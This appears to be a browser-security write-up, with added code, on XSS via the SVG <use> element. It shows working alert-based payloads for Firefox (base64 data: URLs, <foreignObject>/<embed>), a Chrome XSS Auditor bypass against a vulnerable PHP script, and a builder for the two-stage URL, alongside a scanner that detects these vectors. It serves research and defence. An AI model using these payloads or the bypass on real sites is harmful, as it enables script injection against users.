======================================SVG <use> element======================================
The <use> element in SVG lets you reuse other elements. It is mostly used together with <defs> and the like, but it can also reference an element inside an external SVG file. The referenced element is addressed by its id in the xlink:href attribute of the <use> tag, after the '#' character. Referencing an external element follows this basic structure:
test.html:
<svg><use xlink:href="external.svg#rectangle" /></svg>
external.svg:
<svg id="rectangle" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="100" height="100"><a xlink:href="javascript:alert(location)"><rect x="0" y="0" width="100" height="100" /></a></svg>
The file external.svg starts with an <svg> element whose id is set to "rectangle", and draws a rectangle with a <rect> element. Wrapping the <rect> in an <a> element turns it into a hyperlink, and with the javascript: URL scheme the JavaScript runs as soon as the rectangle is clicked. The JavaScript executes even though the SVG is pulled in through <use>. Note that <use> can only load SVG files, and the referenced file must satisfy the same-origin policy.
======================================Firefox======================================
Because the external SVG file must be same-origin, this feature does not look like a useful XSS vector at first. Firefox, however, extends it for us: the data: URL scheme is accepted here, which lets us create the "external" file on the fly. It needs the correct MIME type, image/svg+xml, followed by the payload, or by the keyword base64 and the base64-encoded payload. Base64-encoding the data has the nice side effect that the payload does not break the HTML structure of the page it is injected into. We no longer depend on a second file on the server:
test.html:
<svg><use xlink:href="data:image/svg+xml;base64,PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiAgICB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+DQo8YSB4bGluazpocmVmPSJqYXZhc2NyaXB0OmFsZXJ0KGxvY2F0aW9uKSI+PHJlY3QgeD0iMCIgeT0iMCIgd2lkdGg9IjEwMCIgaGVpZ2h0PSIxMDAiIC8+PC9hPg0KPC9zdmc+#rectangle" /></svg>
The base64 payload, decoded:
<svg id="rectangle" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="100" height="100"><a xlink:href="javascript:alert(location)"><rect x="0" y="0" width="100" height="100" /></a></svg>
The browser renders a black rectangle and pops up the location when it is clicked. But why bother the victim with clicking? They never do what they are supposed to do :) A <script> element inside the external SVG is not executed, but SVG also offers the <foreignObject> element, which (here with requiredExtensions set to the XHTML namespace) can host non-SVG content. That means <iframe>, <embed> and every other supported HTML element become available, and we can pick one of them to execute JavaScript. Here we use <embed> together with a javascript: URL; the SVG looks like this:
<svg id="rectangle" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="100" height="100"><script>alert(1)</script><foreignObject width="100" height="50" requiredExtensions="http://www.w3.org/1999/xhtml"><embed xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(location)" /></foreignObject></svg>
It loads an <embed> element through <foreignObject> and uses the javascript: URL scheme to execute JavaScript. The payload is base64-encoded again and loaded from test.html via the data: scheme:
<svg><use xlink:href="data:image/svg+xml;base64,…#rectangle" /></svg>
Opening test.html in Firefox 27 pops up the location, with no click required.
So this is another vector for executing JavaScript from SVG. The payload also still contains <script>alert(1)</script>, which never fires; this confirms that the <script> element is not executed in this context.
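The checks a defender would want for the vectors above, as an added example that is not code from the original post: a scanner for untrusted SVG markup that flags a <use> whose target is not a same-document "#id", unwraps and rescans a data: target, and reports javascript: URLs and the elements (<foreignObject>, <embed>, <script>, ...) that let SVG carry HTML. It is a regex tag scanner, not an XML parser, so treat it as a detection aid for an upload pipeline or test suite rather than a sanitizer. It assumes Node.js (for Buffer); the rule names and the sample payload are this example's own.

```javascript
// Added example (not from the original post): flag <use>-based SVG vectors.
// Regex tag scanner, not an XML parser: a detection aid, not a sanitizer.

const SUSPECT_ELEMENTS = new Set(["script", "foreignobject", "embed", "iframe", "object"]);
const URL_ATTRS = new Set(["href", "xlink:href", "src"]);
const MAX_DEPTH = 3; // nested data: payloads to unwrap before giving up

// One start tag and its raw attribute string. Quoted values may contain '>'
// (e.g. a reflected <svg> inside a <use> target), so quotes are matched first.
const TAG_RE = /<([a-zA-Z][\w:.-]*)((?:\s+[\w:.-]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?)*)\s*\/?>/g;
const ATTR_RE = /([\w:.-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;

// Browsers skip whitespace and control characters when reading a scheme,
// so "java\tscript:" must be treated like "javascript:".
function normalizeScheme(value) {
  return value.replace(/[\s\x00-\x1f]/g, "").toLowerCase();
}

// Decode the body of a data: URL (base64 or percent-encoded), dropping the
// trailing "#fragment" that <use> needs to address an element inside it.
function decodeDataUrl(value) {
  const noFragment = value.split("#")[0];
  const comma = noFragment.indexOf(",");
  if (comma < 0) return "";
  const mediaType = noFragment.slice("data:".length, comma).toLowerCase();
  const body = noFragment.slice(comma + 1);
  return mediaType.endsWith(";base64")
    ? Buffer.from(body, "base64").toString("utf8")
    : decodeURIComponent(body);
}

// Returns a list of findings: { rule, tag | target, depth }.
function scanSvg(markup, depth = 0) {
  const findings = [];
  for (const tag of markup.matchAll(TAG_RE)) {
    const name = tag[1].toLowerCase();
    if (SUSPECT_ELEMENTS.has(name)) {
      findings.push({ rule: "suspect-element", tag: name, depth });
    }
    for (const attr of tag[2].matchAll(ATTR_RE)) {
      const attrName = attr[1].toLowerCase();
      if (!URL_ATTRS.has(attrName)) continue;
      const value = (attr[2] ?? attr[3] ?? attr[4] ?? "").trim();
      const scheme = normalizeScheme(value);
      if (scheme.startsWith("javascript:")) {
        findings.push({ rule: "javascript-url", tag: name, depth });
      }
      // A <use> pointing anywhere but "#id" in the same document pulls in
      // another file (or, in Firefox, a data: payload).
      if (name === "use" && attrName !== "src" && !value.startsWith("#")) {
        findings.push({ rule: "external-use-target", target: value, depth });
        if (scheme.startsWith("data:") && depth < MAX_DEPTH) {
          findings.push(...scanSvg(decodeDataUrl(value), depth + 1));
        }
      }
    }
  }
  return findings;
}

function isCleanSvg(markup) {
  return scanSvg(markup).length === 0;
}

// Constructed sample mirroring the Firefox <foreignObject> vector above.
const FF_INNER_SVG =
  '<svg id="rectangle" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="100" height="100">' +
  '<foreignObject width="100" height="50" requiredExtensions="http://www.w3.org/1999/xhtml">' +
  '<embed xmlns="http://www.w3.org/1999/xhtml" src="javascript:alert(location)" /></foreignObject></svg>';
const FF_SAMPLE_PAYLOAD =
  '<svg><use xlink:href="data:image/svg+xml;base64,' +
  Buffer.from(FF_INNER_SVG).toString("base64") + '#rectangle" /></svg>';

console.log(scanSvg(FF_SAMPLE_PAYLOAD));
```

On the sample payload the scanner reports the external <use> target at depth 0 and, after decoding the data: URL, the <foreignObject>, the <embed> and its javascript: src at depth 1. A plain `<use xlink:href="#id">` referencing a <defs> entry in the same document produces no findings.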
======================================Chrome XSS Auditor bypass======================================
Chrome does not accept the data: scheme in the xlink:href attribute of <use>, and no way to execute JavaScript without user interaction has been found. With user interaction, however, the Blink/WebKit XSS Auditor can be bypassed without parameter pollution: a single parameter is enough. (The Blink/WebKit XSS Auditor is known not to catch XSS attacks that are split across two or more parameters; here we need only one.)
Take a look at this PHP script (xss.php):
<?php
echo "<body>";
echo $_GET['x'];
echo "</body>";
?>
This script is trivially vulnerable to XSS, but a payload like the following triggers the XSS Auditor:
http://site.com/xss.php?x=<svg><a xlink:href="javascript:alert(location)"><rect x="0" y="0" width="100" height="100" /></a></svg>
Therefore, let's use the <use> element.
======================================Creating SVG on the fly======================================
We want to load another SVG file, so we start with <svg><use xlink:href=
But wait: the target has to be same-origin, and in Chrome we cannot use the data: pseudo-scheme. So how do we get a file onto the server? Easy: we use the XSS vulnerability twice in a row! First we build a URL that makes xss.php reflect an SVG containing a javascript: link:
http://site.com/xss.php?x=<svg id="rectangle" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="100" height="100"><a xlink:href="javascript:alert(location)"><rect class="blue" x="0" y="0" width="100" height="100" /></a></svg>
Pasting this URL into a browser without an XSS filter immediately shows a black rectangle, but as noted above Chrome's XSS Auditor catches it. Let's continue: now we reference that reflected SVG (on the same origin) from a <use> element, building a URL like this:
http://site.com/xss.php?x=<svg><use height=200 width=200 xlink:href='http://site.com/xss.php?x=<svg id="rectangle" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="100" height="100"><a xlink:href="javascript:alert(location)"><rect class="blue" x="0" y="0" width="100" height="100" /></a></svg>#rectangle' /></svg>
Do not forget to perform URL encoding:
http://site.com/xss.php?x=%3Csvg%3E%3Cuse%20height=200%20width=200%20xlink:href=%27http://site.com/xss.php?x=%3Csvg%20id%3D%22rectangle%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Axlink%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2Fxlink%22%20%20%20%20width%3D%22100%22%20height%3D%22100%22%3E%3Ca%20xlink%3Ahref%3D%22javascript%3Aalert%28location%29%22%3E%3Crect%20class%3D%22blue%22%20x%3D%220%22%20y%3D%220%22%20width%3D%22100%22%20height%3D%22100%22%20%2F%3E%3C%2Fa%3E%3C%2Fsvg%3E%23rectangle%27/%3E%3C/svg%3E
This displays the rectangle, and clicking it executes the alert, this time without triggering the XSS Auditor :)
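The two-stage construction above, as an added example that is not code from the original post: it builds the nested URL with the URL encoding applied once per stage, refuses a cross-origin <use> target (which the browser would never follow), and peels the stages apart again so you can confirm what xss.php reflects at each step. The host http://site.com/xss.php, the parameter name x and the fragment id rectangle follow the post; the function names are this example's own and it assumes Node.js with the WHATWG URL global.

```javascript
// Added example (not from the original post): build and unwrap the
// two-stage <svg><use> URL with correctly nested percent-encoding.

// Stage 1: a URL that makes xss.php reflect the inner SVG, which then
// serves as the "external" SVG file for <use>.
function buildStage1(base, innerSvg) {
  return base + "?x=" + encodeURIComponent(innerSvg);
}

// Stage 2: a URL that makes xss.php reflect an outer <svg><use> pointing at
// stage 1. The whole stage-1 URL sits inside an attribute of the outer
// payload, so it gets percent-encoded a second time. <use> only follows
// same-origin targets, so a cross-origin stage 1 is rejected here instead of
// silently producing a URL the browser will never render.
function buildStage2(outerBase, innerBase, innerSvg, fragmentId) {
  if (new URL(outerBase).origin !== new URL(innerBase).origin) {
    throw new Error("<use> target must be same-origin with the embedding page");
  }
  const target = buildStage1(innerBase, innerSvg) + "#" + fragmentId;
  const outerSvg =
    '<svg><use height="200" width="200" xlink:href="' + target + '" /></svg>';
  return outerBase + "?x=" + encodeURIComponent(outerSvg);
}

// Undo the nesting one decoding layer at a time, the way the server and the
// browser will see it: { outerSvg, useTarget, innerSvg }.
function unwrapStages(url) {
  const outerSvg = new URL(url).searchParams.get("x");
  const m = /xlink:href="([^"]*)"/.exec(outerSvg || "");
  if (!m) throw new Error("outer stage carries no <use xlink:href>");
  const useTarget = m[1];
  const innerSvg = new URL(useTarget).searchParams.get("x");
  return { outerSvg, useTarget, innerSvg };
}

// Constructed sample: the reflected SVG with the clickable javascript: link.
const REFLECTED_SVG =
  '<svg id="rectangle" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="100" height="100">' +
  '<a xlink:href="javascript:alert(location)"><rect class="blue" x="0" y="0" width="100" height="100" /></a></svg>';
const SAMPLE_URL = buildStage2(
  "http://site.com/xss.php", "http://site.com/xss.php", REFLECTED_SVG, "rectangle");

console.log(SAMPLE_URL);
console.log(unwrapStages(SAMPLE_URL));
```

The point of encoding per stage is that the inner payload's quotes and angle brackets arrive at xss.php as %22 and %3C inside the <use> target, so the outer SVG attribute is never broken and the final URL carries no raw markup characters at all.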
References:
http://insert-script.blogspot.com/2014/02/svg-fun-time-firefox-svg-vector.html
Bypassing XSS Auditor with SVG